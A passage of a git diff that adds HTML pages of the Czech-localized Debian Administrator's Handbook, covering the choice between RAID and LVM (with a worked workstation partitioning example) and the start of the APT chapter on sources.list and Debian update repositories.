+				RAID and LVM both bring indisputable advantages as soon as one leaves the simple case of a desktop computer with a single hard disk where the usage pattern doesn't change over time. However, RAID and LVM go in two different directions, with diverging goals, and it is legitimate to wonder which one should be adopted. The most appropriate answer will of course depend on current and foreseeable requirements.
+			</div><div
+              class="para">
+				There are a few simple cases where the question doesn't really arise. If the requirement is to safeguard data against hardware failures, then obviously RAID will be set up on a redundant array of disks, since LVM doesn't really address this problem. If, on the other hand, the need is for a flexible storage scheme where the volumes are made independent of the physical layout of the disks, RAID doesn't help much and LVM will be the natural choice.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> If performance matters…</strong></p></div></div></div><div
+                class="para">
+				If input/output speed is of the essence, especially in terms of access times, using LVM and/or RAID in one of the many combinations may have some impact on performances, and this may influence decisions as to which to pick. However, these differences in performance are really minor, and will only be measurable in a few use cases. If performance matters, the best gain to be obtained would be to use non-rotating storage media (<a
+                  id="id-1.15.4.8.4.2.1"
+                  class="indexterm"></a><span
+                  class="emphasis"><em>solid-state drives</em></span> or SSDs); their cost per megabyte is higher than that of standard hard disk drives, and their capacity is usually smaller, but they provide excellent performance for random accesses. If the usage pattern includes many input/output operations scattered all around the filesystem, for instance for databases where complex queries are routinely being run, then the advantage of running them on an SSD far outweigh whatever could be gained by picking LVM over RAID or the reverse. In these situations, the choice should be determined by other considerations than pure speed, since the performance aspect is most easily handled by using SSDs.
+			</div></div><div
+              class="para">
+				The third notable use case is when one just wants to aggregate two disks into one volume, either for performance reasons or to have a single filesystem that is larger than any of the available disks. This case can be addressed both by a RAID-0 (or even linear-RAID) and by an LVM volume. When in this situation, and barring extra constraints (for instance, keeping in line with the rest of the computers if they only use RAID), the configuration of choice will often be LVM. The initial set up is barely more complex, and that slight increase in complexity more than makes up for the extra flexibility that LVM brings if the requirements change or if new disks need to be added.
+			</div><div
+              class="para">
+				Then of course, there is the really interesting use case, where the storage system needs to be made both resistant to hardware failure and flexible when it comes to volume allocation. Neither RAID nor LVM can address both requirements on their own; no matter, this is where we use both at the same time — or rather, one on top of the other. The scheme that has all but become a standard since RAID and LVM have reached maturity is to ensure data redundancy first by grouping disks in a small number of large RAID arrays, and to use these RAID arrays as LVM physical volumes; logical partitions will then be carved from these LVs for filesystems. The selling point of this setup is that when a disk fails, only a small number of RAID arrays will need to be reconstructed, thereby limiting the time spent by the administrator for recovery.
+			</div><div
+              class="para">
+				Let's take a concrete example: the public relations department at Falcot Corp needs a workstation for video editing, but the department's budget doesn't allow investing in high-end hardware from the bottom up. A decision is made to favor the hardware that is specific to the graphic nature of the work (monitor and video card), and to stay with generic hardware for storage. However, as is widely known, digital video does have some particular requirements for its storage: the amount of data to store is large, and the throughput rate for reading and writing this data is important for the overall system performance (more than typical access time, for instance). These constraints need to be fulfilled with generic hardware, in this case two 300 GB SATA hard disk drives; the system data must also be made resistant to hardware failure, as well as some of the user data. Edited videoclips must indeed be safe, but video rushes pending editing are less critical, since they're still on the videotapes.
+			</div><div
+              class="para">
+				RAID-1 and LVM are combined to satisfy these constraints. The disks are attached to two different SATA controllers to optimize parallel access and reduce the risk of a simultaneous failure, and they therefore appear as <code
+                class="filename">sda</code> and <code
+                class="filename">sdc</code>. They are partitioned identically along the following scheme:
+			</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>fdisk -l /dev/sda</code></strong>
+<code
+                class="computeroutput">
+Disk /dev/sda: 300 GB, 300090728448 bytes, 586114704 sectors
+Units: sectors of 1 * 512 = 512 bytes
+Sector size (logical/physical): 512 bytes / 512 bytes
+I/O size (minimum/optimal): 512 bytes / 512 bytes
+Disklabel type: dos
+Disk identifier: 0x00039a9f
+
+Device    Boot     Start       End   Sectors Size Id Type
+/dev/sda1 *         2048   1992060   1990012 1.0G fd Linux raid autodetect
+/dev/sda2        1992061   3984120   1992059 1.0G 82 Linux swap / Solaris
+/dev/sda3        4000185 586099395 582099210 298G 5  Extended
+/dev/sda5        4000185 203977305 199977120 102G fd Linux raid autodetect
+/dev/sda6      203977306 403970490 199993184 102G fd Linux raid autodetect
+/dev/sda7      403970491 586099395 182128904  93G 8e Linux LVM</code></pre><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						The first partitions of both disks (about 1 GB) are assembled into a RAID-1 volume, <code
+                      class="filename">md0</code>. This mirror is directly used to store the root filesystem.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						The <code
+                      class="filename">sda2</code> and <code
+                      class="filename">sdc2</code> partitions are used as swap partitions, providing a total 2 GB of swap space. With 1 GB of RAM, the workstation has a comfortable amount of available memory.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						The <code
+                      class="filename">sda5</code> and <code
+                      class="filename">sdc5</code> partitions, as well as <code
+                      class="filename">sda6</code> and <code
+                      class="filename">sdc6</code>, are assembled into two new RAID-1 volumes of about 100 GB each, <code
+                      class="filename">md1</code> and <code
+                      class="filename">md2</code>. Both these mirrors are initialized as physical volumes for LVM, and assigned to the <code
+                      class="filename">vg_raid</code> volume group. This VG thus contains about 200 GB of safe space.
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						The remaining partitions, <code
+                      class="filename">sda7</code> and <code
+                      class="filename">sdc7</code>, are directly used as physical volumes, and assigned to another VG called <code
+                      class="filename">vg_bulk</code>, which therefore ends up with roughly 200 GB of space.
+					</div></li></ul></div><div
+              class="para">
+				Once the VGs are created, they can be partitioned in a very flexible way. One must keep in mind that LVs created in <code
+                class="filename">vg_raid</code> will be preserved even if one of the disks fails, which will not be the case for LVs created in <code
+                class="filename">vg_bulk</code>; on the other hand, the latter will be allocated in parallel on both disks, which allows higher read or write speeds for large files.
+			</div><div
+              class="para">
+				We will therefore create the <code
+                class="filename">lv_usr</code>, <code
+                class="filename">lv_var</code> and <code
+                class="filename">lv_home</code> LVs on <code
+                class="filename">vg_raid</code>, to host the matching filesystems; another large LV, <code
+                class="filename">lv_movies</code>, will be used to host the definitive versions of movies after editing. The other VG will be split into a large <code
+                class="filename">lv_rushes</code>, for data straight out of the digital video cameras, and a <code
+                class="filename">lv_tmp</code> for temporary files. The location of the work area is a less straightforward choice to make: while good performance is needed for that volume, is it worth risking losing work if a disk fails during an editing session? Depending on the answer to that question, the relevant LV will be created on one VG or the other.
+			</div><div
+              class="para">
+				We now have both some redundancy for important data and much flexibility in how the available space is split across the applications. Should new software be installed later on (for editing audio clips, for instance), the LV hosting <code
+                class="filename">/usr/</code> can be grown painlessly.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>NOTE</em></span> Why three RAID-1 volumes?</strong></p></div></div></div><div
+                class="para">
+				We could have set up one RAID-1 volume only, to serve as a physical volume for <code
+                  class="filename">vg_raid</code>. Why create three of them, then?
+			</div><div
+                class="para">
+				The rationale for the first split (<code
+                  class="filename">md0</code> vs. the others) is about data safety: data written to both elements of a RAID-1 mirror are exactly the same, and it is therefore possible to bypass the RAID layer and mount one of the disks directly. In case of a kernel bug, for instance, or if the LVM metadata become corrupted, it is still possible to boot a minimal system to access critical data such as the layout of disks in the RAID and LVM volumes; the metadata can then be reconstructed and the files can be accessed again, so that the system can be brought back to its nominal state.
+			</div><div
+                class="para">
+				The rationale for the second split (<code
+                  class="filename">md1</code> vs. <code
+                  class="filename">md2</code>) is less clear-cut, and more related to acknowledging that the future is uncertain. When the workstation is first assembled, the exact storage requirements are not necessarily known with perfect precision; they can also evolve over time. In our case, we can't know in advance the actual storage space requirements for video rushes and complete video clips. If one particular clip needs a very large amount of rushes, and the VG dedicated to redundant data is less than halfway full, we can re-use some of its unneeded space. We can remove one of the physical volumes, say <code
+                  class="filename">md2</code>, from <code
+                  class="filename">vg_raid</code> and either assign it to <code
+                  class="filename">vg_bulk</code> directly (if the expected duration of the operation is short enough that we can live with the temporary drop in performance), or undo the RAID setup on <code
+                  class="filename">md2</code> and integrate its components <code
+                  class="filename">sda6</code> and <code
+                  class="filename">sdc6</code> into the bulk VG (which grows by 200 GB instead of 100 GB); the <code
+                  class="filename">lv_rushes</code> logical volume can then be grown according to requirements.
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-services.html"><strong>Předcházející</strong>11.8. Real-Time Communication Services</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtualization.html"><strong>Další</strong>12.2. Virtualization</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/apt.html b/publish/cs-CZ/Debian/9/html/debian-handbook/apt.html
new file mode 100644
index 000000000..24539bd3d
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/apt.html
@@ -0,0 +1,746 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 6. Maintenance and Updates: The APT Tools</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="apt, apt-get, apt-cache, aptitude, synaptic, sources.list, apt-cdrom" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.coexistence-with-other-packaging-systems.html"
+        title="5.5. Coexistence with Other Packaging Systems" /><link
+        rel="next"
+        href="sect.apt-get.html"
+        title="6.2. aptitude, apt-get, and apt Commands" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/apt.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-get.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="apt"></a>Kapitola 6. Maintenance and Updates: The APT Tools</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="apt.html#sect.apt-sources.list">6.1. Filling in the <code
+                    class="filename">sources.list</code> File</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.6">6.1.1. Syntax</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.7">6.1.2. Repositories for <span
+                        class="distribution distribution">Stable</span> Users</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.8">6.1.3. Repositories for <span
+                        class="distribution distribution">Testing</span>/<span
+                        class="distribution distribution">Unstable</span> Users</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.9">6.1.4. Using Alternate Mirrors</a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.10">6.1.5. Non-Official Resources: <code
+                        class="literal">mentors.debian.net</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="apt.html#id-1.9.10.11">6.1.6. Caching Proxy for Debian Packages</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.apt-get.html">6.2. <code
+                    class="command">aptitude</code>, <code
+                    class="command">apt-get</code>, and <code
+                    class="command">apt</code> Commands</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#id-1.9.11.8">6.2.1. Initialization</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#id-1.9.11.9">6.2.2. Installing and Removing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt-upgrade">6.2.3. System Upgrade</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt-config">6.2.4. Configuration Options</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt.priorities">6.2.5. Managing Package Priorities</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.apt-mix-distros">6.2.6. Working with Several Distributions</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-get.html#sect.automatic-tracking">6.2.7. Tracking Automatically Installed Packages</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.apt-cache.html">6.3. The <code
+                    class="command">apt-cache</code> Command</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.apt-frontends.html">6.4. Frontends: <code
+                    class="command">aptitude</code>, <code
+                    class="command">synaptic</code></a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.apt-frontends.html#sect.aptitude">6.4.1. <code
+                        class="command">aptitude</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apt-frontends.html#id-1.9.13.7">6.4.2. <code
+                        class="command">synaptic</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.package-authentication.html">6.5. Checking Package Authenticity</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.dist-upgrade.html">6.6. Upgrading from One Stable Distribution to the Next</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.dist-upgrade.html#id-1.9.15.3">6.6.1. Recommended Procedure</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dist-upgrade.html#id-1.9.15.4">6.6.2. Handling Problems after an Upgrade</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.regular-upgrades.html">6.7. Keeping a System Up to Date</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.automatic-upgrades.html">6.8. Automatic Upgrades</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.5">6.8.1. Configuring <code
+                        class="command">dpkg</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.6">6.8.2. Configuring APT</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.7">6.8.3. Configuring <code
+                        class="command">debconf</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.8">6.8.4. Handling Command Line Interactions</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.automatic-upgrades.html#id-1.9.17.9">6.8.5. The Miracle Combination</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.searching-packages.html">6.9. Searching for Packages</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		What makes Debian so popular with administrators is how easily software can be installed and how easily the whole system can be updated. This unique advantage is largely due to the <span
+              class="emphasis"><em>APT</em></span> program, that Falcot Corp administrators studied with enthusiasm.
+	</div></div><div
+          class="para">
+		<a
+            id="id-1.9.4.1"
+            class="indexterm"></a> <a
+            id="id-1.9.4.2"
+            class="indexterm"></a> APT is the abbreviation for Advanced Package Tool. What makes this program “advanced” is its approach to packages. It doesn't simply evaluate them individually, but it considers them as a whole and produces the best possible combination of packages depending on what is available and compatible (according to dependencies).
+	</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Package source and source package</strong></p></div></div></div><div
+            class="para">
+		The word <span
+              class="emphasis"><em>source</em></span> can be ambiguous. A source package — a package containing the source code of a program — should not be confused with a package source — a repository (website, FTP server, CD-ROM, local directory, etc.) which contains packages.
+	</div></div><div
+          class="para">
+		APT needs to be given a “list of package sources”: the file <code
+            class="filename">/etc/apt/sources.list</code> will list the different repositories (or “sources”) that publish Debian packages. APT will then import the list of packages published by each of these sources. This operation is achieved by downloading <code
+            class="filename">Packages.xz</code> or a variant using a different compression method (such as <code
+            class="filename">Packages.gz</code> or <code
+            class="filename">.bz2</code>) files (in case of a source of binary packages) and <code
+            class="filename">Sources.xz</code> or a variant (in case of a source of source packages) and by analyzing their contents. When an old copy of these files is already present, APT can update it by only downloading the differences (see sidebar <a
+            class="xref"
+            href="sect.apt-get.html#sidebar.apt-pdiff"><span
+              class="emphasis"><em>TIP</em></span> Incremental upgrade</a>).
+	</div><a
+          id="id-1.9.7"
+          class="indexterm"></a><a
+          id="id-1.9.8"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> <code
+                      class="command">gzip</code>, <code
+                      class="command">bzip2</code>, <code
+                      class="command">LZMA</code> and <code
+                      class="command">XZ</code> Compression</strong></p></div></div></div><a
+            id="id-1.9.9.2"
+            class="indexterm"></a><a
+            id="id-1.9.9.3"
+            class="indexterm"></a><a
+            id="id-1.9.9.4"
+            class="indexterm"></a><a
+            id="id-1.9.9.5"
+            class="indexterm"></a><div
+            class="para">
+		A <code
+              class="filename">.gz</code> extension refers to a file compressed with the <code
+              class="command">gzip</code> utility. <code
+              class="command">gzip</code> is the fast and efficient traditional Unix utility to compress files. Newer tools achieve better rates of compression but require more resources (computation time and memory) to compress and uncompress a file. Among them, and by order of appearance, there are <code
+              class="command">bzip2</code> (generating files with a <code
+              class="filename">.bz2</code> extension), <code
+              class="command">lzma</code> (generating <code
+              class="filename">.lzma</code> files) and <code
+              class="command">xz</code> (generating <code
+              class="filename">.xz</code> files).
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.apt-sources.list"></a>6.1. Filling in the <code
+                    class="filename">sources.list</code> File</h2></div></div></div><a
+            id="id-1.9.10.2"
+            class="indexterm"></a><a
+            id="id-1.9.10.3"
+            class="indexterm"></a><a
+            id="id-1.9.10.4"
+            class="indexterm"></a><a
+            id="id-1.9.10.5"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.6"></a>6.1.1. Syntax</h3></div></div></div><div
+              class="para">
+				Each active line of the <code
+                class="filename">/etc/apt/sources.list</code> file contains the description of a source, made of 3 parts separated by spaces.
+			</div><div
+              class="para">
+				The first field indicates the source type:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+						“<code
+                      class="literal">deb</code>” for binary packages,
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						“<code
+                      class="literal">deb-src</code>” for source packages.
+					</div></li></ul></div><div
+              class="para">
+				The second field gives the base URL of the source (combined with the filenames present in the <code
+                class="filename">Packages.xz</code> files, it must give a full and valid URL): this can consist in a Debian mirror or in any other package archive set up by a third party. The URL can start with <code
+                class="literal">file://</code> to indicate a local source installed in the system's file hierarchy, with <code
+                class="literal">http://</code> to indicate a source accessible from a web server, or with <code
+                class="literal">ftp://</code> for a source available on an FTP server. The URL can also start with <code
+                class="literal">cdrom:</code> for CD-ROM/DVD-ROM/Blu-ray disc based installations, although this is less frequent, since network-based installation methods are more and more common.
+			</div><div
+              class="para">
+				The syntax of the last field depends on the structure of the repository. In the simplest cases, you can simply indicate a subdirectory (with a required trailing slash) of the desired source (this is often a simple “<code
+                class="filename">./</code>” which refers to the absence of a subdirectory — the packages are then directly at the specified URL). But in the most common case, the repositories will be structured like a Debian mirror, with multiple distributions each having multiple components. In those cases, name the chosen distribution (by its “codename” — see the list in sidebar <a
+                class="xref"
+                href="sect.foundation-documents.html#sidebar.bruce-perens"><span
+                  class="emphasis"><em>KOMUNITA</em></span> Bruce Perens, kontroverzní vůdce</a> — or by the corresponding “suites” — <code
+                class="literal">stable</code>, <code
+                class="literal">testing</code>, <code
+                class="literal">unstable</code>), then the components (or sections) to enable (chosen between <code
+                class="literal">main</code>, <code
+                class="literal">contrib</code>, and <code
+                class="literal">non-free</code> in a typical Debian mirror).
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.sections"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> The <code
+                          class="literal">main</code>, <code
+                          class="literal">contrib</code> and <code
+                          class="literal">non-free</code> archives</strong></p></div></div></div><a
+                id="id-1.9.10.6.7.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.4"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.5"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.6"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.7"
+                class="indexterm"></a><a
+                id="id-1.9.10.6.7.8"
+                class="indexterm"></a><div
+                class="para">
+				Debian uses three sections to differentiate packages according to the licenses chosen by the authors of each work. <code
+                  class="literal">Main</code> gathers all packages which fully comply with the Debian Free Software Guidelines.
+			</div><div
+                class="para">
+				The <code
+                  class="literal">non-free</code> archive is different because it contains software which does not (entirely) conform to these principles but which can nevertheless be distributed without restrictions. This archive, which is not officially part of Debian, is a service for users who could need some of those programs — however Debian always recommends giving priority to free software. The existence of this section represents a considerable problem for Richard M. Stallman and keeps the Free Software Foundation from recommending Debian to users.
+			</div><div
+                class="para">
+				<code
+                  class="literal">Contrib</code> (contributions) is a set of open source software which cannot function without some non-free elements. These elements can be software from the <code
+                  class="literal">non-free</code> section, or non-free files such as game ROMs, BIOS of consoles, etc. <code
+                  class="literal">Contrib</code> also includes free software whose compilation requires proprietary elements. This was initially the case for the OpenOffice.org office suite, which used to require a proprietary Java environment.
+			</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> <code
+                          class="filename">/etc/apt/sources.list.d/*.list</code> files</strong></p></div></div></div><div
+                class="para">
+				If many package sources are referenced, it can be useful to split them in multiple files. Each part is then stored in <code
+                  class="filename">/etc/apt/sources.list.d/<em
+                    class="replaceable">filename</em>.list</code> (see sidebar <a
+                  class="xref"
+                  href="sect.apt-get.html#sidebar.directory.d"><span
+                    class="emphasis"><em>BACK TO BASICS</em></span> Directories ending in <code
+                    class="filename">.d</code></a>).
+			</div></div><a
+              id="id-1.9.10.6.9"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="literal">cdrom</code> entries describe the CD/DVD-ROMs you have. Contrary to other entries, a CD-ROM is not always available since it has to be inserted into the drive and since only one disc can be read at a time. For those reasons, these sources are managed in a slightly different way, and need to be added with the <code
+                class="command">apt-cdrom</code> program, usually executed with the <code
+                class="literal">add</code> parameter. The latter will then request the disc to be inserted in the drive and will browse its contents looking for <code
+                class="filename">Packages</code> files. It will use these files to update its database of available packages (this operation is usually done by the <code
+                class="command">apt update</code> command). From then on, APT can require the disc to be inserted if it needs one of its packages.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.7"></a>6.1.2. Repositories for <span
+                      class="distribution distribution">Stable</span> Users</h3></div></div></div><div
+              class="para">
+				Here is a standard <code
+                class="filename">sources.list</code> for a system running the <span
+                class="distribution distribution">Stable</span> version of Debian:
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="example.stable-sources-list"></a><p
+                class="title"><strong>Příklad 6.1. <code
+                    class="filename">/etc/apt/sources.list</code> file for users of Debian Stable</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting"># Security updates
+deb http://security.debian.org/ stretch/updates main contrib non-free
+deb-src http://security.debian.org/ stretch/updates main contrib non-free
+
+## Debian mirror
+
+# Base repository
+deb http://deb.debian.org/debian stretch main contrib non-free
+deb-src http://deb.debian.org/debian stretch main contrib non-free
+
+# Stable updates
+deb http://deb.debian.org/debian stretch-updates main contrib non-free
+deb-src http://deb.debian.org/debian stretch-updates main contrib non-free
+
+# Stable backports
+deb http://deb.debian.org/debian stretch-backports main contrib non-free
+deb-src http://deb.debian.org/debian stretch-backports main contrib non-free
+</pre></div></div><div
+              class="para">
+				This file lists all sources of packages associated with the <span
+                class="distribution distribution">Stretch</span> version of Debian (the current <span
+                class="distribution distribution">Stable</span> as of this writing). We opted to name “stretch” explicitly instead of using the corresponding “stable“ alias (<code
+                class="literal">stable</code>, <code
+                class="literal">stable-updates</code>, <code
+                class="literal">stable-backports</code>) because we don't want to have the underlying distribution changed outside of our control when the next stable release comes out.
+			</div><div
+              class="para">
+				Most packages will come from the “base repository” which contains all packages but is seldom updated (about once every 2 months for a “point release”). The other repositories are partial (they do not contain all packages) and can host updates (packages with newer version) that APT might install. The following sections will explain the purpose and the rules governing each of those repositories.
+			</div><div
+              class="para">
+				Note that when the desired version of a package is available on several repositories, the first one listed in the <code
+                class="filename">sources.list</code> file will be used. For this reason, non-official sources are usually added at the end of the file.
+			</div><div
+              class="para">
+				As a side note, most of what this section says about <span
+                class="distribution distribution">Stable</span> applies equally well to <span
+                class="distribution distribution">Oldstable</span> since the latter is just an older <span
+                class="distribution distribution">Stable</span> that is maintained in parallel.
+			</div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.security-updates"></a>6.1.2.1. Security Updates</h4></div></div></div><a
+                id="id-1.9.10.7.8.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.8.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.8.4"
+                class="indexterm"></a><div
+                class="para">
+					The security updates are not hosted on the usual network of Debian mirrors but on <code
+                  class="literal">security.debian.org</code> (on a small set of machines maintained by the <a
+                  class="link"
+                  href="sect.debian-internals.html#dsa-team">Debian System Administrators</a>). This archive contains security updates (prepared by the Debian Security Team and/or by package maintainers) for the <span
+                  class="distribution distribution">Stable</span> distribution.
+				</div><div
+                class="para">
+					The server can also host security updates for <span
+                  class="distribution distribution">Testing</span> but this doesn't happen very often since those updates tend to reach <span
+                  class="distribution distribution">Testing</span> via the regular flow of updates coming from <span
+                  class="distribution distribution">Unstable</span>.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.stable-updates"></a>6.1.2.2. Stable Updates</h4></div></div></div><a
+                id="id-1.9.10.7.9.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.9.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.9.4"
+                class="indexterm"></a><div
+                class="para">
+					Stable updates are not security sensitive but are deemed important enough to be pushed to users before the next stable point release.
+				</div><div
+                class="para">
+					This repository will typically contain fixes for critical bugs which could not be fixed before release or which have been introduced by subsequent updates. Depending on the urgency, it can also contain updates for packages that have to evolve over time… like <span
+                  class="pkg pkg">spamassassin</span>'s spam detection rules, <span
+                  class="pkg pkg">clamav</span>'s virus database, or the daylight-saving time rules of all timezones (<span
+                  class="pkg pkg">tzdata</span>).
+				</div><div
+                class="para">
+					In practice, this repository is a subset of the <code
+                  class="literal">proposed-updates</code> repository, carefully selected by the Stable Release Managers.
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.proposed-updates"></a>6.1.2.3. Proposed Updates</h4></div></div></div><a
+                id="id-1.9.10.7.10.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.10.3"
+                class="indexterm"></a><div
+                class="para">
+					Once published, the <span
+                  class="distribution distribution">Stable</span> distribution is only updated about once every 2 months. The <code
+                  class="literal">proposed-updates</code> repository is where the expected updates are prepared (under the supervision of the Stable Release Managers).
+				</div><div
+                class="para">
+					The security and stable updates documented in the former sections are always included in this repository, but there is more too, because package maintainers also have the opportunity to fix important bugs that do not deserve an immediate release.
+				</div><div
+                class="para">
+					Anyone can use this repository to test those updates before their official publication. The extract below uses the <code
+                  class="literal">stretch-proposed-updates</code> alias which is both more explicit and more consistent since <code
+                  class="literal">jessie-proposed-updates</code> also exists (for the <span
+                  class="distribution distribution">Oldstable</span> updates):
+				</div><pre
+                class="programlisting">deb http://ftp.debian.org/debian stretch-proposed-updates main contrib non-free
+</pre></div><div
+              class="section"><div
+                class="titlepage"><div><div><h4
+                      class="title"><a
+                        xmlns=""
+                        id="sect.backports"></a>6.1.2.4. Stable Backports</h4></div></div></div><a
+                id="id-1.9.10.7.11.2"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.11.3"
+                class="indexterm"></a><a
+                id="id-1.9.10.7.11.4"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">stable-backports</code> repository hosts “package backports”. The term refers to a package of some recent software which has been recompiled for an older distribution, generally for <span
